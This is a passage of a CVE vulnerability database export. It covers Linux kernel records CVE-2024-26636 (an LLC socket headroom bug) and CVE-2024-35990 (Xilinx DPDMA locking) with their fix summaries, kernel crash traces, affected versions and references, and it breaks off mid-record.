"url": "https://git.kernel.org/stable/c/a8e4d098de1c0f4c5c1f2ed4633a860f0da6d713"
},
{
"url": "https://git.kernel.org/stable/c/82827ca21e7c8a91384c5baa656f78a5adfa4ab4"
},
{
"url": "https://git.kernel.org/stable/c/f2f26b4a84a0ef41791bd2d70861c8eac748f4ba"
}
],
"title": "nilfs2: fix failure to detect DAT corruption in btree and direct mappings",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26956",
"datePublished": "2024-05-01T05:18:56.101Z",
"dateReserved": "2024-02-19T14:20:24.200Z",
"dateUpdated": "2025-05-04T09:00:39.824Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26636 (GCVE-0-2024-26636)
Vulnerability from cvelistv5
Published
2024-03-18 10:14
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
llc: make llc_ui_sendmsg() more robust against bonding changes
syzbot was able to trick llc_ui_sendmsg(), allocating an skb with no
headroom, but subsequently trying to push 14 bytes of Ethernet header [1]
Like some others, llc_ui_sendmsg() releases the socket lock before
calling sock_alloc_send_skb().
Then it acquires it again, but does not redo all the sanity checks
that were performed.
This fix:
- Uses LL_RESERVED_SPACE() to reserve space.
- Check all conditions again after socket lock is held again.
- Do not account Ethernet header for mtu limitation.
[1]
skbuff: skb_under_panic: text:ffff800088baa334 len:1514 put:14 head:ffff0000c9c37000 data:ffff0000c9c36ff2 tail:0x5dc end:0x6c0 dev:bond0
kernel BUG at net/core/skbuff.c:193 !
Internal error: Oops - BUG: 00000000f2000800 [#1] PREEMPT SMP
Modules linked in:
CPU: 0 PID: 6875 Comm: syz-executor.0 Not tainted 6.7.0-rc8-syzkaller-00101-g0802e17d9aca-dirty #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023
pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : skb_panic net/core/skbuff.c:189 [inline]
pc : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203
lr : skb_panic net/core/skbuff.c:189 [inline]
lr : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203
sp : ffff800096f97000
x29: ffff800096f97010 x28: ffff80008cc8d668 x27: dfff800000000000
x26: ffff0000cb970c90 x25: 00000000000005dc x24: ffff0000c9c36ff2
x23: ffff0000c9c37000 x22: 00000000000005ea x21: 00000000000006c0
x20: 000000000000000e x19: ffff800088baa334 x18: 1fffe000368261ce
x17: ffff80008e4ed000 x16: ffff80008a8310f8 x15: 0000000000000001
x14: 1ffff00012df2d58 x13: 0000000000000000 x12: 0000000000000000
x11: 0000000000000001 x10: 0000000000ff0100 x9 : e28a51f1087e8400
x8 : e28a51f1087e8400 x7 : ffff80008028f8d0 x6 : 0000000000000000
x5 : 0000000000000001 x4 : 0000000000000001 x3 : ffff800082b78714
x2 : 0000000000000001 x1 : 0000000100000000 x0 : 0000000000000089
Call trace:
skb_panic net/core/skbuff.c:189 [inline]
skb_under_panic+0x13c/0x140 net/core/skbuff.c:203
skb_push+0xf0/0x108 net/core/skbuff.c:2451
eth_header+0x44/0x1f8 net/ethernet/eth.c:83
dev_hard_header include/linux/netdevice.h:3188 [inline]
llc_mac_hdr_init+0x110/0x17c net/llc/llc_output.c:33
llc_sap_action_send_xid_c+0x170/0x344 net/llc/llc_s_ac.c:85
llc_exec_sap_trans_actions net/llc/llc_sap.c:153 [inline]
llc_sap_next_state net/llc/llc_sap.c:182 [inline]
llc_sap_state_process+0x1ec/0x774 net/llc/llc_sap.c:209
llc_build_and_send_xid_pkt+0x12c/0x1c0 net/llc/llc_sap.c:270
llc_ui_sendmsg+0x7bc/0xb1c net/llc/af_llc.c:997
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
sock_sendmsg+0x194/0x274 net/socket.c:767
splice_to_socket+0x7cc/0xd58 fs/splice.c:881
do_splice_from fs/splice.c:933 [inline]
direct_splice_actor+0xe4/0x1c0 fs/splice.c:1142
splice_direct_to_actor+0x2a0/0x7e4 fs/splice.c:1088
do_splice_direct+0x20c/0x348 fs/splice.c:1194
do_sendfile+0x4bc/0xc70 fs/read_write.c:1254
__do_sys_sendfile64 fs/read_write.c:1322 [inline]
__se_sys_sendfile64 fs/read_write.c:1308 [inline]
__arm64_sys_sendfile64+0x160/0x3b4 fs/read_write.c:1308
__invoke_syscall arch/arm64/kernel/syscall.c:37 [inline]
invoke_syscall+0x98/0x2b8 arch/arm64/kernel/syscall.c:51
el0_svc_common+0x130/0x23c arch/arm64/kernel/syscall.c:136
do_el0_svc+0x48/0x58 arch/arm64/kernel/syscall.c:155
el0_svc+0x54/0x158 arch/arm64/kernel/entry-common.c:678
el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:696
el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:595
Code: aa1803e6 aa1903e7 a90023f5 94792f6a (d4210000)
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26636",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-18T15:30:36.675601Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:11.012Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.780Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04f2a74b562f3a7498be0399309669f342793d8c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c22044270da68881074fda81a7d34812726cb249"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d53b813ff8b177f86f149c2f744442681f720e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6632747be9ee15dc0029db4b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c451c008f563d56d5e676c9dcafae565fcad84bb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dad555c816a50c6a6a8a86be1f9177673918c647"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/llc/af_llc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "04f2a74b562f3a7498be0399309669f342793d8c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c22044270da68881074fda81a7d34812726cb249",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6d53b813ff8b177f86f149c2f744442681f720e4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cafd3ad3fe03ef4d6632747be9ee15dc0029db4b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c451c008f563d56d5e676c9dcafae565fcad84bb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "dad555c816a50c6a6a8a86be1f9177673918c647",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/llc/af_llc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nllc: make llc_ui_sendmsg() more robust against bonding changes\n\nsyzbot was able to trick llc_ui_sendmsg(), allocating an skb with no\nheadroom, but subsequently trying to push 14 bytes of Ethernet header [1]\n\nLike some others, llc_ui_sendmsg() releases the socket lock before\ncalling sock_alloc_send_skb().\nThen it acquires it again, but does not redo all the sanity checks\nthat were performed.\n\nThis fix:\n\n- Uses LL_RESERVED_SPACE() to reserve space.\n- Check all conditions again after socket lock is held again.\n- Do not account Ethernet header for mtu limitation.\n\n[1]\n\nskbuff: skb_under_panic: text:ffff800088baa334 len:1514 put:14 head:ffff0000c9c37000 data:ffff0000c9c36ff2 tail:0x5dc end:0x6c0 dev:bond0\n\n kernel BUG at net/core/skbuff.c:193 !\nInternal error: Oops - BUG: 00000000f2000800 [#1] PREEMPT SMP\nModules linked in:\nCPU: 0 PID: 6875 Comm: syz-executor.0 Not tainted 6.7.0-rc8-syzkaller-00101-g0802e17d9aca-dirty #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023\npstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n pc : skb_panic net/core/skbuff.c:189 [inline]\n pc : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203\n lr : skb_panic net/core/skbuff.c:189 [inline]\n lr : skb_under_panic+0x13c/0x140 net/core/skbuff.c:203\nsp : ffff800096f97000\nx29: ffff800096f97010 x28: ffff80008cc8d668 x27: dfff800000000000\nx26: ffff0000cb970c90 x25: 00000000000005dc x24: ffff0000c9c36ff2\nx23: ffff0000c9c37000 x22: 00000000000005ea x21: 00000000000006c0\nx20: 000000000000000e x19: ffff800088baa334 x18: 1fffe000368261ce\nx17: ffff80008e4ed000 x16: ffff80008a8310f8 x15: 0000000000000001\nx14: 1ffff00012df2d58 x13: 0000000000000000 x12: 0000000000000000\nx11: 0000000000000001 x10: 0000000000ff0100 x9 : e28a51f1087e8400\nx8 : e28a51f1087e8400 x7 : ffff80008028f8d0 x6 : 0000000000000000\nx5 : 0000000000000001 x4 : 0000000000000001 x3 : ffff800082b78714\nx2 : 0000000000000001 x1 : 0000000100000000 x0 : 0000000000000089\nCall trace:\n skb_panic net/core/skbuff.c:189 [inline]\n skb_under_panic+0x13c/0x140 net/core/skbuff.c:203\n skb_push+0xf0/0x108 net/core/skbuff.c:2451\n eth_header+0x44/0x1f8 net/ethernet/eth.c:83\n dev_hard_header include/linux/netdevice.h:3188 [inline]\n llc_mac_hdr_init+0x110/0x17c net/llc/llc_output.c:33\n llc_sap_action_send_xid_c+0x170/0x344 net/llc/llc_s_ac.c:85\n llc_exec_sap_trans_actions net/llc/llc_sap.c:153 [inline]\n llc_sap_next_state net/llc/llc_sap.c:182 [inline]\n llc_sap_state_process+0x1ec/0x774 net/llc/llc_sap.c:209\n llc_build_and_send_xid_pkt+0x12c/0x1c0 net/llc/llc_sap.c:270\n llc_ui_sendmsg+0x7bc/0xb1c net/llc/af_llc.c:997\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n sock_sendmsg+0x194/0x274 net/socket.c:767\n splice_to_socket+0x7cc/0xd58 fs/splice.c:881\n do_splice_from fs/splice.c:933 [inline]\n direct_splice_actor+0xe4/0x1c0 fs/splice.c:1142\n splice_direct_to_actor+0x2a0/0x7e4 fs/splice.c:1088\n do_splice_direct+0x20c/0x348 fs/splice.c:1194\n do_sendfile+0x4bc/0xc70 fs/read_write.c:1254\n __do_sys_sendfile64 fs/read_write.c:1322 [inline]\n __se_sys_sendfile64 fs/read_write.c:1308 [inline]\n __arm64_sys_sendfile64+0x160/0x3b4 fs/read_write.c:1308\n __invoke_syscall arch/arm64/kernel/syscall.c:37 [inline]\n invoke_syscall+0x98/0x2b8 arch/arm64/kernel/syscall.c:51\n el0_svc_common+0x130/0x23c arch/arm64/kernel/syscall.c:136\n do_el0_svc+0x48/0x58 arch/arm64/kernel/syscall.c:155\n el0_svc+0x54/0x158 arch/arm64/kernel/entry-common.c:678\n el0t_64_sync_handler+0x84/0xfc arch/arm64/kernel/entry-common.c:696\n el0t_64_sync+0x190/0x194 arch/arm64/kernel/entry.S:595\nCode: aa1803e6 aa1903e7 a90023f5 94792f6a (d4210000)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:48.420Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b"
},
{
"url": "https://git.kernel.org/stable/c/b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d"
},
{
"url": "https://git.kernel.org/stable/c/04f2a74b562f3a7498be0399309669f342793d8c"
},
{
"url": "https://git.kernel.org/stable/c/c22044270da68881074fda81a7d34812726cb249"
},
{
"url": "https://git.kernel.org/stable/c/6d53b813ff8b177f86f149c2f744442681f720e4"
},
{
"url": "https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6632747be9ee15dc0029db4b"
},
{
"url": "https://git.kernel.org/stable/c/c451c008f563d56d5e676c9dcafae565fcad84bb"
},
{
"url": "https://git.kernel.org/stable/c/dad555c816a50c6a6a8a86be1f9177673918c647"
}
],
"title": "llc: make llc_ui_sendmsg() more robust against bonding changes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26636",
"datePublished": "2024-03-18T10:14:47.795Z",
"dateReserved": "2024-02-19T14:20:24.136Z",
"dateUpdated": "2025-05-04T08:52:48.420Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35990 (GCVE-0-2024-35990)
Vulnerability from cvelistv5
Published
2024-05-20 09:47
Modified
2025-05-04 09:10
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dma: xilinx_dpdma: Fix locking
There are several places where either chan->lock or chan->vchan.lock was
not held. Add appropriate locking. This fixes lockdep warnings like
[ 31.077578] ------------[ cut here ]------------
[ 31.077831] WARNING: CPU: 2 PID: 40 at drivers/dma/xilinx/xilinx_dpdma.c:834 xilinx_dpdma_chan_queue_transfer+0x274/0x5e0
[ 31.077953] Modules linked in:
[ 31.078019] CPU: 2 PID: 40 Comm: kworker/u12:1 Not tainted 6.6.20+ #98
[ 31.078102] Hardware name: xlnx,zynqmp (DT)
[ 31.078169] Workqueue: events_unbound deferred_probe_work_func
[ 31.078272] pstate: 600000c5 (nZCv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[ 31.078377] pc : xilinx_dpdma_chan_queue_transfer+0x274/0x5e0
[ 31.078473] lr : xilinx_dpdma_chan_queue_transfer+0x270/0x5e0
[ 31.078550] sp : ffffffc083bb2e10
[ 31.078590] x29: ffffffc083bb2e10 x28: 0000000000000000 x27: ffffff880165a168
[ 31.078754] x26: ffffff880164e920 x25: ffffff880164eab8 x24: ffffff880164d480
[ 31.078920] x23: ffffff880165a148 x22: ffffff880164e988 x21: 0000000000000000
[ 31.079132] x20: ffffffc082aa3000 x19: ffffff880164e880 x18: 0000000000000000
[ 31.079295] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000
[ 31.079453] x14: 0000000000000000 x13: ffffff8802263dc0 x12: 0000000000000001
[ 31.079613] x11: 0001ffc083bb2e34 x10: 0001ff880164e98f x9 : 0001ffc082aa3def
[ 31.079824] x8 : 0001ffc082aa3dec x7 : 0000000000000000 x6 : 0000000000000516
[ 31.079982] x5 : ffffffc7f8d43000 x4 : ffffff88003c9c40 x3 : ffffffffffffffff
[ 31.080147] x2 : ffffffc7f8d43000 x1 : 00000000000000c0 x0 : 0000000000000000
[ 31.080307] Call trace:
[ 31.080340] xilinx_dpdma_chan_queue_transfer+0x274/0x5e0
[ 31.080518] xilinx_dpdma_issue_pending+0x11c/0x120
[ 31.080595] zynqmp_disp_layer_update+0x180/0x3ac
[ 31.080712] zynqmp_dpsub_plane_atomic_update+0x11c/0x21c
[ 31.080825] drm_atomic_helper_commit_planes+0x20c/0x684
[ 31.080951] drm_atomic_helper_commit_tail+0x5c/0xb0
[ 31.081139] commit_tail+0x234/0x294
[ 31.081246] drm_atomic_helper_commit+0x1f8/0x210
[ 31.081363] drm_atomic_commit+0x100/0x140
[ 31.081477] drm_client_modeset_commit_atomic+0x318/0x384
[ 31.081634] drm_client_modeset_commit_locked+0x8c/0x24c
[ 31.081725] drm_client_modeset_commit+0x34/0x5c
[ 31.081812] __drm_fb_helper_restore_fbdev_mode_unlocked+0x104/0x168
[ 31.081899] drm_fb_helper_set_par+0x50/0x70
[ 31.081971] fbcon_init+0x538/0xc48
[ 31.082047] visual_init+0x16c/0x23c
[ 31.082207] do_bind_con_driver.isra.0+0x2d0/0x634
[ 31.082320] do_take_over_console+0x24c/0x33c
[ 31.082429] do_fbcon_takeover+0xbc/0x1b0
[ 31.082503] fbcon_fb_registered+0x2d0/0x34c
[ 31.082663] register_framebuffer+0x27c/0x38c
[ 31.082767] __drm_fb_helper_initial_config_and_unlock+0x5c0/0x91c
[ 31.082939] drm_fb_helper_initial_config+0x50/0x74
[ 31.083012] drm_fbdev_dma_client_hotplug+0xb8/0x108
[ 31.083115] drm_client_register+0xa0/0xf4
[ 31.083195] drm_fbdev_dma_setup+0xb0/0x1cc
[ 31.083293] zynqmp_dpsub_drm_init+0x45c/0x4e0
[ 31.083431] zynqmp_dpsub_probe+0x444/0x5e0
[ 31.083616] platform_probe+0x8c/0x13c
[ 31.083713] really_probe+0x258/0x59c
[ 31.083793] __driver_probe_device+0xc4/0x224
[ 31.083878] driver_probe_device+0x70/0x1c0
[ 31.083961] __device_attach_driver+0x108/0x1e0
[ 31.084052] bus_for_each_drv+0x9c/0x100
[ 31.084125] __device_attach+0x100/0x298
[ 31.084207] device_initial_probe+0x14/0x20
[ 31.084292] bus_probe_device+0xd8/0xdc
[ 31.084368] deferred_probe_work_func+0x11c/0x180
[ 31.084451] process_one_work+0x3ac/0x988
[ 31.084643] worker_thread+0x398/0x694
[ 31.084752] kthread+0x1bc/0x1c0
[ 31.084848] ret_from_fork+0x10/0x20
[ 31.084932] irq event stamp: 64549
[ 31.084970] hardirqs last enabled at (64548): [<ffffffc081adf35c>] _raw_spin_unlock_irqrestore+0x80/0x90
[ 31.085157]
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7cbb0c63de3fc218fd06ecfedb477772a4d12f76 Version: 7cbb0c63de3fc218fd06ecfedb477772a4d12f76 Version: 7cbb0c63de3fc218fd06ecfedb477772a4d12f76 Version: 7cbb0c63de3fc218fd06ecfedb477772a4d12f76 Version: 7cbb0c63de3fc218fd06ecfedb477772a4d12f76 Version: 7cbb0c63de3fc218fd06ecfedb477772a4d12f76 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35990",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-18T14:42:31.810522Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-18T14:42:59.781Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:30:11.494Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fcdd5bb4a8c81c64c1334d7e0aba41a8829a24de"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0ccac964520a6f19e355652c8ca38af2a7f27076"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8bf574183282d219cfa991f7df37aad491d74c11"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e3c94767cad5150198e4337c8b91f3bb068e14b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c660be571609e03e7d5972343536a736fcb31557"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/244296cc3a155199a8b080d19e645d7d49081a38"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma/xilinx/xilinx_dpdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fcdd5bb4a8c81c64c1334d7e0aba41a8829a24de",
"status": "affected",
"version": "7cbb0c63de3fc218fd06ecfedb477772a4d12f76",
"versionType": "git"
},
{
"lessThan": "0ccac964520a6f19e355652c8ca38af2a7f27076",
"status": "affected",
"version": "7cbb0c63de3fc218fd06ecfedb477772a4d12f76",
"versionType": "git"
},
{
"lessThan": "8bf574183282d219cfa991f7df37aad491d74c11",
"status": "affected",
"version": "7cbb0c63de3fc218fd06ecfedb477772a4d12f76",
"versionType": "git"
},
{
"lessThan": "8e3c94767cad5150198e4337c8b91f3bb068e14b",
"status": "affected",
"version": "7cbb0c63de3fc218fd06ecfedb477772a4d12f76",
"versionType": "git"
},
{
"lessThan": "c660be571609e03e7d5972343536a736fcb31557",
"status": "affected",
"version": "7cbb0c63de3fc218fd06ecfedb477772a4d12f76",
"versionType": "git"
},
{
"lessThan": "244296cc3a155199a8b080d19e645d7d49081a38",
"status": "affected",
"version": "7cbb0c63de3fc218fd06ecfedb477772a4d12f76",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma/xilinx/xilinx_dpdma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
